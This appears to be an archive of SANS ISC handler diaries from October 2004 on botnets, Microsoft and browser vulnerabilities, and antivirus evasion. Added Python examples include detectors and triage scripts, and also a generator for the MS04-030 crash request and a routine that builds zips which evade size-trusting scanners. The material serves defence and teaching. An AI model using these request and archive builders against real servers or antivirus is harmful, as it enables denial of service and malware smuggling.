Please give us *complete* information. We need information that will allow us to substantially confirm the "charges" that you're making. Hey... it's not that we don't trust you, but you're asking us to get machines shut down, and before we're going to try to do that, we're going to want to check things out for ourselves. (OK, so perhaps it really IS that we don't trust you. Just don't take it personally: we're professionally paranoid.) Beyond the IP address of the machine that you believe is acting as a bot controller, we need to know the port that the control channel is running on. Lately, we've been seeing many of these controllers running IRC on non-standard ports. Also, if you can give us any information on the channel or nicks being used, that would be incredibly helpful. (A suggestion: if it's within your power to reboot a machine infected with a bot, if you monitor connections as it reboots, you'll likely see channel connection information.)

Best of all is to only turn to us after you've attempted to get the machine shut down yourself. What?!? Is the ISC shirking its duty? Naaaaah. We really do try to work on everything that gets reported to us. However, there are only about 30 of us, so sometimes we get stretched a little thin.

Courtesy of ISC Handler Pedro Bueno, here are some tips for becoming a Do-It-Yourself incident handler:

1) If you have the IP address of the botnet controller, you could try to send an email to the security/abuse address at the responsible ISP to report it. A whois tool will help you identify the ISP responsible for that IP address. On a Unix-like system, the command "whois" can give you this information: whois <Botnet-IP-Address>.

On Windows, if you don't have a whois client, you can use one of the web-based whois services to look up the information, e.g. "GeekTools" at http://www.geektools.com/whois.php . Remember to be specific in the information that you provide, and BE POLITE.

2) If you don't receive any information or acknowledgment from the ISP, or if you don't want to make the initial contact yourself, you could do the initial leg-work and then send the information that you've gathered to the ISC using our contact form ( http://isc.sans.org/contact.php ). Please pass along the WHOIS information on the ISP that you found, and if possible the "AS" number of the ISP. The Team Cymru whois server can provide this information, so point your WHOIS client at whois.cymru.com.

3) If, for whatever reason, you don't want to use the whois servers/services above, or don't want to contact the ISP, or if you don't seem to be getting anywhere, then please inform us through the ISC contact form. Be sure to list the IP address and the port number that the botnet is using, any channel/nick/password information you may have, and whether you believe that it is currently active.

(Thanks Pedro!)
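As a worked example of steps 1 and 2, added here and not part of Pedro's tips: a small Python script that pulls the abuse contact out of a whois answer, pulls the AS number out of a Team Cymru answer, and assembles the facts the ISC asks for into a report body. All three sample answers are constructed; the key names (OrgAbuseEmail for ARIN-style records, abuse-mailbox for RIPE-style records) and the pipe-separated layout of the Cymru verbose output are assumptions to be checked against live output, since registries change their formats.

```python
# Constructed ARIN-style whois answer for the controller IP (not real data).
WHOIS_ARIN = """\
NetRange:       192.0.2.0 - 192.0.2.255
CIDR:           192.0.2.0/24
OrgName:        Example Hosting, Inc.
OrgAbuseHandle: ABUSE1-ARIN
OrgAbuseEmail:  abuse@hosting.example
OrgTechEmail:   noc@hosting.example
"""

# Constructed RIPE-style answer: the same fact lives under a different key.
WHOIS_RIPE = """\
inetnum:        198.51.100.0 - 198.51.100.255
netname:        EXAMPLE-NET
abuse-mailbox:  abuse@isp.example
e-mail:         hostmaster@isp.example
"""

# Constructed answer from whois.cymru.com (verbose mode, one row per IP).
CYMRU = """\
AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
64496   | 192.0.2.10       | 192.0.2.0/24        | US | arin     | 2001-01-01 | EXAMPLE-HOSTING, US
"""


def abuse_contacts(whois_text):
    """Return abuse e-mail addresses found in a whois answer, in the order seen."""
    found = []
    for line in whois_text.splitlines():
        key, sep, val = line.partition(":")
        if not sep:
            continue
        key, val = key.strip().lower(), val.strip()
        is_abuse_key = key in ("orgabuseemail", "abuse-mailbox")
        is_abuse_mail = key in ("e-mail", "email") and val.lower().startswith("abuse@")
        if (is_abuse_key or is_abuse_mail) and val and val not in found:
            found.append(val)
    return found


def cymru_lookup(cymru_text):
    """Parse Cymru verbose rows into {ip: {asn, prefix, cc, registry, as_name}}."""
    result = {}
    for line in cymru_text.splitlines():
        cols = [c.strip() for c in line.split("|")]
        if len(cols) < 7 or not cols[0].isdigit():   # skips the header row
            continue
        result[cols[1]] = {"asn": cols[0], "prefix": cols[2], "cc": cols[3],
                           "registry": cols[4], "as_name": cols[6]}
    return result


def build_report(ip, port, channel, evidence, whois_text, cymru_text):
    """Assemble the facts the ISC asks for into a plain-text report body."""
    contacts = abuse_contacts(whois_text)
    asn = cymru_lookup(cymru_text).get(ip, {})
    lines = [
        f"Suspected botnet controller: {ip} tcp/{port}",
        f"IRC channel/nick seen: {channel}",
        f"Origin AS: AS{asn.get('asn', '?')} ({asn.get('as_name', 'unknown')}), "
        f"prefix {asn.get('prefix', '?')}",
        f"Abuse contacts from whois: {', '.join(contacts) or 'none found'}",
        "Evidence (timestamps in UTC):",
    ]
    lines += ["  " + e for e in evidence]
    return "\n".join(lines)


if __name__ == "__main__":
    print(build_report("192.0.2.10", 6667, "#scan",
                       ["2004-10-21 14:57:15 bot joined #scan from 203.0.113.5"],
                       WHOIS_ARIN, CYMRU))
```

Feed the script the real output of "whois <ip>" and "whois -h whois.cymru.com ' -v <ip>'" instead of the constructed strings; the point of the parser is that it looks for the abuse key rather than the first address it sees, so the report does not go to a NOC mailbox that will ignore it.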

Glitch In The Matrix?

Have a feeling of Deja Vu? ISC Handler Ed Skoudis has documented some strangeness with Microsoft's Windows Update. It seems as though the folks in Redmond changed things for a bit today. When visiting Windows Update, rather than scanning your system to show if you were current with patches, WU presented visitors with the following:

Thank you for your interest in Windows Update
Windows Update is the online extension of Microsoft Windows
that helps you get the most out of your computer.
Follow these steps to access Windows Update through the
Help and support Center:
* Click Start, and then click Help and support.
* If you are running Windows XP, click Keep your computer
up-to-date with Windows Update.
* If you are running a Windows Server 2003 family product,
click Windows Update.

According to Ed, things are back to normal now.

Usually, we would all just nod a lot and say "Sure, Ed..." (Remember: "Professional Paranoia") but he actually trotted out some screen caps to prove his point. So, did anyone else notice this?

UPDATE: A reader has written in confirming exactly what Ed saw. We never really doubted you, Ed ;-)

Bouncing Malware III Actually *IS* In the Works

I've gotten several requests from readers wanting to know when "Follow The Bouncing Malware, Part III" will be out. I've been working on it, but please realize that analyzing just one of the MANY malware samples takes several hours, so writing each of the installments is very, VERY time consuming (even if I didn't have other things to do ;-). Please be patient for a little while longer.

(Be nice to "cousin" Kevin...)


Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-10-20

Browser Vulnerabilities (all browsers), MS04-030 and -032 POC exploit released

Vulnerable Browser Day

If you are reading this diary with any web browser other than 'lynx' or 'wget', you are likely vulnerable to one of the issues released today. The first issue covers all browsers that support tabbed browsing (Firefox, Netscape, Opera, Konqueror...). The second issue is only of interest to Microsoft Internet Explorer users.

(1) Tabbed Browsing Dialog Spoofing

A malicious website may display a dialog box above a "trusted" site after the user clicks a link directing them from the malicious site to the trusted site. The user has to open the new site in a new tab. For a quick test, see:

(none available right now; we will update this space as they become available.)

(2) Two vulnerabilities in MSIE

The first vulnerability is a modified "drag&drop" exploit. The original problem was fixed with this month's patches, but this version still works.

The second vulnerability allows malicious web pages to bypass the security zone restrictions using crafted .hhk files (Windows Help Index).

We are not aware of any patches for either vulnerability. However, you can avoid these vulnerabilities by disabling Active Scripting. See:


for details.

MS04-030 POC

A proof-of-concept (POC) exploit for MS04-030 has been made available. The exploit, a Perl script, claims to trigger the DoS condition. While we are still working to verify the exploit, here are some signatures to look for:

The exploit will send the following header:

(the 'Host' field will hold the IP address of the attacked host. In this
example, we used '')


Content-type: text/xml
Content-length: 188963

<?xml version="1.0"?>
<a:propfind xmlns:a="DAV:" xmlns:z1="xml:" xmlns:z2="xml:" xmlns:z3="xml:" xmlns

(... repeating 'xmlns:z???="xml:", where '???' keeps incrementing ...)

xmlns:z9995="xml:" xmlns:z9996="xml:" xmlns:z9997="xml:"
xmlns:z9998="xml:" >

For Apache servers, the exploit will leave the following log entries:

Access Log: - - [20/Oct/2004:14:57:15 +0000] "PROPFIND / HTTP/1.1" 400 31
"-" "-"
Error Log:

[Wed Oct 20 14:57:15 2004] [error] [client] request failed:
error reading the headers

(Your Apache install may use a different log format.)

If working "as advertised", the exploit will crash unpatched IIS servers.

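The two signatures above (a PROPFIND with an XML body declaring thousands of namespaces, and the "PROPFIND / HTTP/1.1" 400 entry Apache leaves behind) are easy to turn into a check. The following is an added example, not the exploit script and not code from the diary: it parses a raw request and counts xmlns declarations, and it picks the failed PROPFINDs out of combined-format log lines. The threshold of 100 namespaces and the client address 192.0.2.10 are assumptions; the diary's own example left the Host field blank, and the request here is constructed only to exercise the detector.

```python
import re

# Assumption: a legitimate PROPFIND body declares only a handful of XML
# namespaces; the PoC described above declares on the order of 10,000.
XMLNS_THRESHOLD = 100
XMLNS_RE = re.compile(rb'xmlns:[^\s=]+\s*=\s*"')

# Combined-log-format fields we care about.
APACHE_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                       r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})')


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, target, _version = request_line.split(b" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return method.decode("latin-1"), target.decode("latin-1"), headers, body


def looks_like_ms04_030(raw):
    """True when a request matches the PoC pattern: PROPFIND carrying an XML
    body that declares an absurd number of namespaces."""
    method, _target, headers, body = parse_request(raw)
    if method != "PROPFIND":
        return False
    if "xml" not in headers.get("content-type", "").lower():
        return False
    return len(XMLNS_RE.findall(body)) >= XMLNS_THRESHOLD


def apache_propfind_failures(log_lines):
    """(client, timestamp) for PROPFIND requests Apache rejected with 400,
    the footprint the diary shows for this PoC against a non-IIS server."""
    hits = []
    for line in log_lines:
        m = APACHE_RE.match(line)
        if m and m["method"] == "PROPFIND" and m["status"] == "400":
            hits.append((m["client"], m["ts"]))
    return hits


def build_propfind(namespace_count, host=b"192.0.2.10"):
    """Construct a PROPFIND shaped like the one described above.
    Test input only; it is not the exploit and carries no attack payload."""
    ns = b" ".join(b'xmlns:z%d="xml:"' % i for i in range(1, namespace_count + 1))
    body = (b'<?xml version="1.0"?>\r\n<a:propfind xmlns:a="DAV:" ' + ns +
            b' ><a:prop/></a:propfind>')
    head = (b"PROPFIND / HTTP/1.1\r\nHost: " + host +
            b"\r\nContent-type: text/xml\r\nContent-length: %d\r\n\r\n" % len(body))
    return head + body


# Constructed Apache entries in the same shape as the diary's access-log line.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Oct/2004:14:57:15 +0000] "PROPFIND / HTTP/1.1" 400 31 "-" "-"',
    '198.51.100.7 - - [20/Oct/2004:14:58:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
]
```

Counting declarations rather than matching the literal "xmlns:z" prefix catches a trivially renamed copy of the script; the 400 in Apache's log is a side effect of the oversized header block and will also appear for other broken clients, so treat it as a lead, not proof.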
MS04-032 Windows XP Metafile Overflow POC

Looks like the kids are finally catching up with all the MSFT vulnerabilities released this month. A POC (proof-of-concept) exploit was released to exploit the Windows XP Metafile overflow vulnerability.

The malicious file will start a remote shell or connect back to a URL.

This functionality goes beyond what is typically considered a 'proof-of-concept', as it allows full remote control of the system with all the privileges of the user that opened the image.

The good thing is that some AV vendors already detect it. From the VirusTotal website:

BitDefender 7.0 10.20.2004 Exploit.FPSE.A

Sybari 7.5.1314 10.20.2004 Exploit-MS03-051

Symantec 8.0 10.19.2004 Trojan.Moo

The Manager's Briefing at http://isc.sans.org/presentations/MS04Oct.ppt has been updated to reflect the existence of these exploits.


Pedro Bueno, Johannes Ullrich.


Published: 2004-10-19

Multiple anti-virus software evasion

Multiple Anti-virus software evasion

Anti-virus software from McAfee, Computer Associates, Kaspersky, Sophos, Eset and RAV is known to be vulnerable to an evasion attack in which the attacker crafts a compressed (zip) file containing malicious code that the anti-virus software never scans.

The problem is caused by incorrect handling of header information within the zip file. Some anti-virus software skips scanning files whose size, as indicated by the header, is zero. The header size information does not affect the decompression of the zip file, so the malicious content still extracts normally.

Reference: http://www.idefense.com/application/poi/display?id=153&type=vulnerabilities&flashstatus=true

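The header trick described above, as an added example (not code from the iDEFENSE advisory or from any of the affected products): build an ordinary zip, set the uncompressed-size field of one member's local file header to zero, and compare a scanner that trusts that field with one that inflates every member from the central directory. The marker string standing in for a malware signature is constructed.

```python
import io
import struct
import zipfile
import zlib

# Constructed stand-in for a real malware signature.
MARKER = b"X-CONSTRUCTED-MALWARE-MARKER"

# ZIP local file header: sig, version, flags, method, time, date, crc32,
# compressed size, uncompressed size, name length, extra length (30 bytes).
LOCAL_HDR = struct.Struct("<IHHHHHIIIHH")
LOCAL_SIG = 0x04034B50
UNCOMPRESSED_SIZE_OFFSET = 22     # byte offset of that field inside the header


def build_zip(entries):
    """Build an ordinary deflated archive from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def zero_uncompressed_size(zip_bytes, name):
    """Rewrite NAME's local header to claim an uncompressed size of zero.
    The central directory, which real unzippers rely on, is untouched, so the
    member still extracts normally."""
    data = bytearray(zip_bytes)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        off = zf.getinfo(name).header_offset
    if struct.unpack_from("<I", data, off)[0] != LOCAL_SIG:
        raise ValueError("not a local file header")
    struct.pack_into("<I", data, off + UNCOMPRESSED_SIZE_OFFSET, 0)
    return bytes(data)


def naive_scan(zip_bytes):
    """A scanner that walks local headers and believes their size fields.
    Returns names of members whose content contains MARKER."""
    hits, pos = [], 0
    while pos + LOCAL_HDR.size <= len(zip_bytes):
        f = LOCAL_HDR.unpack_from(zip_bytes, pos)
        if f[0] != LOCAL_SIG:
            break                                  # reached the central directory
        method, csize, usize, nlen, xlen = f[3], f[7], f[8], f[9], f[10]
        name_start = pos + LOCAL_HDR.size
        data_start = name_start + nlen + xlen
        name = zip_bytes[name_start:name_start + nlen].decode()
        compressed = zip_bytes[data_start:data_start + csize]
        pos = data_start + csize
        if usize == 0:
            continue                               # "empty file": the flaw, never inflated
        plain = zlib.decompress(compressed, -15) if method == 8 else compressed
        if MARKER in plain:
            hits.append(name)
    return hits


def robust_scan(zip_bytes):
    """Inflate every member via the central directory and scan what comes out."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if MARKER in zf.read(info):
                hits.append(info.filename)
    return hits


SAMPLE = build_zip({"readme.txt": b"nothing to see", "payload.txt": b"A" * 64 + MARKER})
EVASIVE = zero_uncompressed_size(SAMPLE, "payload.txt")
```

The lesson for anyone writing an archive scanner: sizes in a header are a hint from the attacker, not a fact; decide what to scan from what the decompressor actually produces, and treat a header that disagrees with the central directory as suspicious in itself.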
Keep chasing Botnets

We have received numerous submissions of Botnets and we are working with authorities to shut them down. Thanks to all who have submitted info to us. If you have any info on Botnets, feel free to send it in.


Jason Lam, jason /AT/ networksec.org


Published: 2004-10-18

Backbone issues?

Backbone issues?

18-Oct-2004 21:00 UTC:

We have had several reports of intermittent ISP level latency and "slowness" issues which we believe may be related to what is being reported as a "backbone outage causing routing instability and packet loss" at Level 3. The problems appear to be centered in the U.S. Northeast. We do not currently have any solid information on the cause or the time-frame for a solution, but Level 3 is aware of the issue and actively working to fix it. We wanted to give our readers a "heads-up": If you are experiencing slow connections, it may not be your imagination. We will post additional information if and when it becomes available.

19-Oct-2004 14:00 UTC:

We have received forwarded reports that the issues with Level 3 were centered within their Washington DC area point of presence. These issues caused a cascading effect both within Level 3 and with other providers and ISPs who pulled BGP sessions with Level 3 to contain the problem. At this time, most issues should have been resolved with the possible exception of sites/ISPs within the DC area itself that are using Level 3 as a provider.

Thanks to: Myles, Michel, and Joseph for updating us.


Handler on Duty: Tom Liston (pinch hitting for John "Sandman" Bambenek)


Published: 2004-10-16

BotNets and Security Awareness in Academia; Potpourri of MS04-028 Scanning Tools from MS

BotNets and Security Awareness in Academia
For those in academia (or similarly open networks), I urge you to pay attention to your networks. As Deb mentioned several days ago, and many of the handlers have noted since, botnets are continuing to grow more widespread. The types of exploits used to gain access do change as we go along, and the complexity of the files used, rootkits deployed, etc. has also increased. The particular variation of botnet I have seen on my campus seems to have used the LSASS vulnerability to gain access to the computers. Many of the tool names seem to be different depending on who and where things are being exploited. As a guess, I would suspect that a framework has been built in which any reasonably computer-literate user can easily change a few settings and compile/pack/deploy their own unique set of tools. Several of the handlers are still working on writing a more complete article of the details that will be posted later.
Yeah...I know none of this is news, but it has made me wonder what more I can do beyond intrusion detection, updating AV, firewalling and quarantining off computers that are not patched or otherwise insecure, and whatever remediation seems wise for any particular situation. The one thing I have realized for my campus is that things do not seem to be getting any better security-wise. The reason...we are not causing our user base to be more aware of proper security procedures. The technologies the hackers are using have continued to work, but we have failed to change from a reactive stance to a proactive one despite expenditures for the above security devices, staff, and initiatives.
This month is Cyber Security Awareness Month, so what have you done on your campus to promote security? I have heard of one university that purchased a number of toothbrushes with slogans to the effect of "You don't share your toothbrush, why share your passwords?" Such gimmicks are very good ways for security professionals to start making our students/faculty/staff actually think about what they are doing and raise the level of awareness. But probably most of us had never thought of such things.
At the Educause conference this week, participants will receive a CD of Security Awareness Resources that was compiled through the efforts of many organizations. If you are in academia and are not at the conference, please make sure that those from your organization who are attending bring you a copy of the CD, and start considering how you can raise the awareness of your campus. For more details about the CD, please see the following from the Educause security mailing list:

Potpourri of MS04-028 Scanning Tools from MS

This week, MS released several new or updated tools to help get a handle on the MS04-028 GDI vulnerability from last month. One of the handlers provided a list of them today to include in the diary. As with the previous tools issued by MS, these tools do not appear to detect third-party software that may have shipped its own copies of the vulnerable DLLs. However, this is a starting point for many corporate technicians to roll out. I would still recommend using the ISC's GDI Scan tools, available at http://isc.sans.org/gdiscan.php , in conjunction with these tools to get the best coverage possible.

* Enterprise Update Scanning Tool for Bulletin MS04-028

This tool is a command line scanning tool built for the sole purpose of helping customers determine systems that may need security updates provided with the MS04-028 bulletin ( http://www.microsoft.com/technet/security/bulletin/ms04-028.mspx ). Users of this tool should have experience in deploying software to corporate environments and with using command line tools. More information on this tool can be found in Knowledge Base article 886988 (KB886988): "How to obtain and use the MS04-028 Enterprise Update Scanning Tool in environments that do not use Systems Management Server".

* SMS MS04-028 Update Scan Tool

This tool is a scan tool built for the sole purpose of helping customers determine SMS client computers that may need security updates provided with the MS04-028 bulletin. Like MBSA, this tool also has the instructions for SMS to locate each applicable update and download it from Microsoft.

* Enterprise Logon Scripts

Logon and Group Policy scripts are powerful, flexible tools that system administrators can use to provide users with a consistent, predictable, and secure computing experience.

* Sample Scripts for verifying client configuration for VPN Quarantine


Scott Fendley

Handler on Duty


Published: 2004-10-15

Manager's Briefing for Microsoft Security Bulletins, MS04-036 Exploit Code, VERITAS Security Patch, Comxt Alternate Data Stream Trojan

Senior IT manager's briefing for this month's Microsoft Security Bulletins

Hot off the press: Marcus Sachs put together a set of PowerPoint slides that provide an overview of this month's Microsoft Security Bulletins from the perspective of senior IT managers. The briefing provides high-level descriptions of the vulnerabilities, explains their relevance, and suggests corrective actions.

PowerPoint file: http://isc.sans.org/presentations/MS04Oct.ppt

Proof-of-concept exploit for the Windows NNTP vulnerability (MS04-036)

If you were wondering how quickly you needed to apply the patches that Microsoft released a couple of days ago, please keep in mind that proof-of-concept exploit code for the Windows NNTP vulnerability (MS04-036) is publicly available. The recent Core Security advisory includes the exploit code, and provides detailed technical information about the vulnerability, which they seem to have reported to Microsoft in mid-August. The Core Security advisory was published just hours after the patches became publicly available--this is a good illustration of the rapidly shrinking time window in which you need to apply security patches. ( http://www.coresecurity.com/common/showdoc.php?idx=420&idxseccion=10 )

A "serious" security vulnerability in VERITAS Cluster Server

VERITAS issued patches to address the "potential for a serious system security breach" in VERITAS Cluster Server for all UNIX platforms. According to the company's advisory, the recently-discovered flaw may provide the attacker with unauthorized root access to the server. ( http://seer.support.veritas.com/docs/271040.htm )

It's tough to assess the severity of this vulnerability, because the advisory doesn't provide any details regarding the issue. Is the problem exploitable over the network, or is local access to the server required? How difficult is it for the attacker to exploit the vulnerability? The generic advice is often to apply the patch as soon as possible; however, real-world system administrators need additional information to prioritize the issue, weighing its risk against other technical and business concerns.

A note at the bottom of the VERITAS advisory suggests that its customers may be able to obtain additional information about the patches by contacting VERITAS Technical Support.

The Comxt trojan and the use of NTFS Alternate Data Streams

The Comxt trojan is somewhat unusual in that it uses NTFS Alternate Data Streams (ADS) to hide its presence in a directory. Although this is not the first such malware specimen, the use of ADS for hiding malicious executable code is not yet widespread. More information about the Comxt trojan is available at:


If you have a copy of Comxt, and don't mind sharing it with us, please send it our way. To learn about ADS take a look at the Hidden Threat: Alternate Data Streams article at:


The article mentions several tools that can detect the presence of ADS on your system. In addition, you may want to check out the Stream Shell Extensions utility that Ryan Means created as part of his GCWN practical write-up on the topic. Ryan's utility adds a "Streams" tab to Windows Explorer when you look at a file's properties; the tab allows you to view and delete streams hidden in the file. You can access the utility and the paper at the following URLs:



Note that anti-virus software varies in its ability to detect malware in ADS. When fellow handler Ed Skoudis tested anti-virus products for his June 2004 Information Security article, he found that only "Network Associates detected malware in ADSes during both on-demand and real-time scans with its default configuration... Default real-time protection against ADS-borne malware is also provided by Computer Associates (CA), F-Secure, Grisoft, Panda Software and Sophos." ( http://infosecuritymag.techtarget.com/ss/0,295796,sid6_iss407_art803,00.html )

Lenny Zeltser

ISC Handler of the Day



Published: 2004-10-14

New Netsky Variant

There appears to be a new version of Netsky circulating, and several antivirus vendors have updated their definitions. System admins and users should check that virus definitions are up to date. Although it does not appear to send anything out, this new variant includes password-stealing code originally from BugBear, so even after the virus has been removed the system may still hold passwords that could already have been retrieved. For this reason it is safest to recommend that every password of every user of a machine found to be compromised be changed.

Botnet information still needed

We have got a lot of botnet information, but we continue to need more, please continue to forward any information you get to us.

Michael Haisley mhaisley@isc.sans.org


Published: 2004-10-13

Aftermath of Microsoft's October Bulletins, more bots, and Linux rootkits

Did you miss the ISC monthly webcast?

It seems that most folks must have spent today trying to digest the 10 Microsoft bulletins released yesterday, because our mailbox was relatively quiet today. That was a large portion of today's monthly ISC webcast. If you missed it live, you can still check it out in the archives. Go to:

Possibly lost in the release of the 10 new bulletins, Microsoft also updated MS04-028 yesterday.

Chasing botnets

Please continue to let us know when you discover botnets and especially if you know how the zombies got infected and where the controller is located. We had a reader today who was able to get onto the IRC server that was controlling the botnet and get a list of infected machines. We're in the process of getting the botnet shut down. Today's victims were infected by what Symantec identified as Trojan.Webus.C and Trend identified as WORM_RANDON.B. Our thanks to Mike for bringing this to our attention.

Linux rootkits

A couple of the handlers are doing some research on the current state of Linux rootkits. If you have any copies of recent (new in the last year or so) Linux rootkits that you'd be willing to share with us, please upload them through the contact form. Thanx.


Jim Clausing, jclausing/at/isc.sans.org


Published: 2004-10-12

October Microsoft Security Bulletins

October Microsoft Security Bulletins. Ten bulletins (seven critical, three important) were released by Microsoft today at http://www.microsoft.com/security/bulletins/200410_windows.mspx and http://www.microsoft.com/security/bulletins/200410_office.mspx

Here is a brief synopsis:

MS04-029 IMPORTANT Vulnerability in RPC Runtime Library Could Allow Information Disclosure and Denial of Service (873350)

An information disclosure and denial of service vulnerability exists that could cause the affected system to stop responding or could potentially read portions of active memory content.

MS04-030 IMPORTANT Vulnerability in WebDav XML Message Handler Could Lead to a Denial of Service (824151)

A Denial of Service vulnerability exists that could cause the affected system to stop responding to requests.

MS04-031 IMPORTANT Vulnerability in NetDDE Could Allow Remote Code Execution (841533)

A remote code execution vulnerability exists in the NetDDE services because of an unchecked buffer.

MS04-032 CRITICAL Security Update for Microsoft Windows (840987)

A remote code execution vulnerability, two elevation of privilege vulnerabilities, and a denial of service vulnerability exist in Windows. The most severe vulnerability could allow remote code execution on an affected system.

MS04-033 CRITICAL Vulnerability in Microsoft Excel Could Allow Remote Code Execution (886836)

A vulnerability exists in Microsoft Excel that could allow remote code execution on an affected system.

MS04-034 CRITICAL Vulnerability in Compressed (zipped) Folders Could Allow Remote Code Execution (873376)

A vulnerability exists in the way that Windows processes compressed (zipped) folders that could allow remote code execution on an affected system.

MS04-035 CRITICAL Vulnerability in SMTP Could Allow Remote Code Execution

A vulnerability exists in the Windows SMTP component and Exchange Server Routing Engine component that could allow remote code execution on an affected system.

MS04-036 CRITICAL Vulnerability in NNTP Could Allow Remote Code Execution

A vulnerability exists in the Windows NNTP Component that could allow remote code execution on an affected system.

MS04-037 CRITICAL Vulnerability in Windows Shell Could Allow Remote Code Execution (841356)

A vulnerability exists in the way that the Windows Shell launches applications. A vulnerability exists in Program Group Converter because of the way that it handles specially crafted requests. Both could allow remote code execution on an affected system.

MS04-038 CRITICAL Cumulative Security Update for Internet Explorer (834707)

Five remote code execution and three information disclosure vulnerabilities exist in Internet Explorer.


Published: 2004-10-11

Web based GDI Vulnerability Scanner; Yet even more fun with bots; Spybot.Worm and Gaobot; MSN Chat access troubles

The ISC now offers a web based GDI Vulnerability Scanner at http://isc.sans.org/vulnscan/iscvuln.php

** Note that it uses an ActiveX control and only runs with Internet Explorer.
Usually I would be on a soap box at this point regarding applications that require one browser versus another but I will give it a rest today.

Yet even more fun with bots.

There has been a lot of talk about hidden bot files lately. Some of the discussion surrounds finding the hidden executables.

To find hidden bot files, run attrib from a command prompt in c:\windows and c:\windows\system32 and look for files marked SHR (system, hidden, read-only). The command could be:

cd c:\winnt\system32 (or cd c:\windows\system32)

attrib | findstr SHR

Windows Explorer will not display these files even with "show hidden files" enabled, because files marked system as well as hidden are treated as protected operating system files. To remove them, use attrib -r -s -h <filename>; then you can move or delete them.

Tips and techniques for tracking down Spybot.Worm or Gaobot

1) Do you have current anti-virus definition files?

2) Has your hosts file been rewritten? C:\winnt\system32\drivers\etc

3) Do you have a lot of unidentified connections to the system? Start - Run - cmd, and at the command prompt type netstat -an. Take a look at the remote addresses that are listed. Do you recognize all of the IPs?

4) If you go into windows task manager do you see any processes running that you don't recognize?

5) If you are comfortable with regedit, go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion. You should see Run, RunOnce and RunServices (you may or may not see RunServices). Do you see any entries that you don't recognize or that look suspicious?

Thanks to handler Deb Hale for these tips.
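The attrib check above and tips 2 and 3 are all "read some command output and look for something odd", which is worth scripting when you have more than a couple of machines to triage. The following is an added example, not code from the diary: it takes the text of attrib, the hosts file and netstat -an (all three samples are constructed, including the file name wupdmgr32.exe) and reports SHR files, AV/update vendor names redirected in the hosts file, and established outbound connections, flagging the standard IRC port range. The vendor-name list and the port list are assumptions to adjust for your environment; as the diary notes, controllers are often on odd ports, so every other established connection is listed for review rather than ignored.

```python
import re

# Constructed samples, not captured from a real host.
ATTRIB_OUTPUT = r"""
A          C:\WINDOWS\system32\calc.exe
A  SHR     C:\WINDOWS\system32\wupdmgr32.exe
A   H      C:\WINDOWS\system32\desktop.ini
"""

HOSTS_FILE = """\
# constructed hosts file with entries a bot might add
127.0.0.1       localhost
127.0.0.1       liveupdate.symantecliveupdate.com
127.0.0.1       download.mcafee.com
10.9.8.7        www.example.org
"""

NETSTAT_OUTPUT = r"""
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    192.168.1.5:1044       10.20.30.40:6667       ESTABLISHED
  TCP    192.168.1.5:1051       10.20.30.41:8080       ESTABLISHED
  TCP    192.168.1.5:1077       203.0.113.9:33333      ESTABLISHED
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
"""

# Assumptions: vendor names whose hosts-file hijack would block AV or patch
# updates, and the port range conventionally used by IRC.
AV_UPDATE_DOMAINS = ("symantec", "mcafee", "kaspersky", "sophos", "trendmicro", "windowsupdate")
IRC_PORTS = set(range(6660, 6670)) | {7000}

# attrib prints attribute letters in a column block, then the full path.
ATTRIB_LINE = re.compile(r"^\s*([A-Z ]*?)\s*([A-Za-z]:\\\S.*)$")


def find_shr_files(attrib_text):
    """Paths whose attribute letters include all of S, H and R."""
    hits = []
    for line in attrib_text.splitlines():
        m = ATTRIB_LINE.match(line)
        if m and {"S", "H", "R"} <= set(m.group(1)):
            hits.append(m.group(2))
    return hits


def find_hijacked_hosts(hosts_text):
    """(hostname, ip) pairs pointing AV/update vendors somewhere they don't belong."""
    hits = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()     # drop comments
        if not line:
            continue
        ip, *names = line.split()
        for name in names:
            if any(d in name.lower() for d in AV_UPDATE_DOMAINS):
                hits.append((name, ip))
    return hits


def classify_connections(netstat_text):
    """Established TCP connections as (remote_ip, remote_port, note)."""
    out = []
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) != 4 or cols[0] != "TCP" or cols[3] != "ESTABLISHED":
            continue
        rhost, rport = cols[2].rsplit(":", 1)
        rport = int(rport)
        note = "standard IRC port" if rport in IRC_PORTS else "review: controllers often use odd ports"
        out.append((rhost, rport, note))
    return out


def triage(attrib_text, hosts_text, netstat_text):
    """Collect the three checks into one dict for the incident notes."""
    return {"shr_files": find_shr_files(attrib_text),
            "hijacked_hosts": find_hijacked_hosts(hosts_text),
            "connections": classify_connections(netstat_text)}
```

On a suspect box, save the three outputs with "attrib > a.txt", "type %SystemRoot%\system32\drivers\etc\hosts > h.txt" and "netstat -an > n.txt" and feed the files to triage(); an SHR executable in system32 plus a hosts file that points the AV vendor at 127.0.0.1 is a strong combination even before you identify the process.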

MSN Chat access troubles
There are some reports of trouble accessing MSN, we have very little detail at this point and do not know the cause.


Published: 2004-10-09

Botnets, PHP includes

Still More Botnets:

We're receiving yet more reports of successful social engineering attacks and GDI+ JPEG attacks that cause a UPX'ed and Morphine'd trojan horse (Gaobot, SDbot, RxBot) to be installed, and the resultant botnet used for typical nefarious

Most current AntiVirus packages don't properly unpack these binaries, and don't detect them terribly well. There are also reports that some of them are interfering with automated AV update procedures.

